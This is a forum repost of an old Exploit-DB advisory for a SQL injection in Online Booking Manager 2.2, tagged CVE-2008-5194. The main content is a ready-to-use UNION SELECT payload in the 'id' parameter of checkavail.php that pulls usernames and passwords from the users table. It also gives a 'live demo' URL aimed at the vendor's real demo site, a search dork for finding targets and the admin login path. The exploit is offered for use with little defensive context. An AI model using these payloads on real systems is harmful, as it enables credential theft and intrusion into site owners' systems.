Exploit Online Booking Manager 2.2 - 'id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5964
Проверка EDB
  1. Пройдено
Автор
HUSSIN X
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5194
Дата публикации
2008-06-28
Код:
#########################################################
#
#    Online Booking Manager2.2 (id=) SQL Injection Vulnerability
#
#########################################################
#
#    Author: Hussin X
#
#    Home :  www.tryag.cc/cc
# 
#    email:  darkangel_g85[at]Yahoo[DoT]com
#            hussin.x[at]hotmail[DoT]com
#
#                     IRAQI
#
##########################################################
#    HomE script : http://www.onlinebookingmanager.com
#                
#           demo : http://demo.onlinebookingmanager.com/guestside/
#     
##########################################################
#
#    DorK : Online Booking Manager2.2
#
##########################################################

Exploit:   


http://www.site.com/obmp22/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




L!VE DEMO:


http://demo.onlinebookingmanager.com/adminside/hotel/obm2.2/checkavail.php?ln=en&id=-1+union+select+concat_ws(0x3a,UserName,UserPassword)+from+users--




Login AdmiN :



/adminside/systemadmin/


####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                          Silic0n/ FAHD / Iraqihack                           #      
#                                                                              #
#################################(and All IRAQIs)###############################

# milw0rm.com [2008-06-28]
 
Источник
www.exploit-db.com

Похожие темы